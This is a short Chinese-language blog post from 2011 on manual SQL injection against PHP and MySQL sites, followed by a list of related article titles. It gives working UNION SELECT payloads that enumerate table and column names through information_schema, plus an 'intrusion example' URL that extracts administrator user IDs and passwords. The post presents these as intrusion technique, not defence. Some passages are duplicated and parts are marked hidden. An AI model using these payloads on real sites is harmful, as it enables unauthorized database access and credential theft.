php+MySql注入非暴力爆字段名
2011-05-29 07:55
169 查看
MySql数据库的版本够了,不需要暴力猜表的,而是“查”表
表可以爆了,出来了,字段出不来怎么办?其实字段也可以查出
查表段时的格式是:
那么,查字段的格式就是:
与爆表类似
在最后一个limit 6,7很明显是范围,从0,1、1,2、2,3、3,4的这么查下去就可以了,直到查出来想要的表名
看一个入侵实例:
本帖隐藏的内容需要回复才可以浏览
爆表:
表可以爆了,出来了,字段出不来怎么办?其实字段也可以查出
查表段时的格式是:
+union select 1,2,3,table_name from (select * from information_schema.tables where table_schema=数据库名字的hex order by table_schema limit 6,7)t limit 1-- |
+union select 1,2,column_name from (select * from information_schema.columns where table_name=爆出来的表名的hex值 and table_schema=数据库名的hex值 order by 1 limit 2,3)t limit 1-- |
在最后一个limit 6,7很明显是范围,从0,1、1,2、2,3、3,4的这么查下去就可以了,直到查出来想要的表名
看一个入侵实例:
本帖隐藏的内容需要回复才可以浏览
爆表:
http://site/jg_view.php?id=141+and+1=2+union+select+1,2,3,4,concat(uid,0x5f,pwd)+from+administrator |
相关文章推荐
- PHP和MySQL注入攻击
- 网络安全系列之十八 MySQL基本操作(PHP注入基础)
- SQL注入系列之PHP+Mysql手动注入(三)----搜索型(POST/GET)
- 利用PHP程序设定防止MySQL注入或HTML表单滥用
- PHP+MYSQL网站注入扫描
- php MySQL 注入教程实例
- php+mysql注入
- PHP+MYSQL 【注入漏洞】攻防测试
- php+mysql注入
- SQL注入系列之PHP+Mysql手动注入(二)----字符型
- php+Mysql注入详解
- PHP+MySQL 网站 SQL 注入攻击测试用例
- php_mysql注入load_file()IIS配置文件获取
- PHP防止mysql注入方法
- 从php+mysql环境的注入,到整台服务器的沦陷
- 对php+mysql的注入攻击
- 防止MySQL注入或HTML表单滥用的PHP程序
- php+mysql注入详细
- PHP mysql防注入
- Web攻防系列教程之 PHP + Mysql注入攻防实战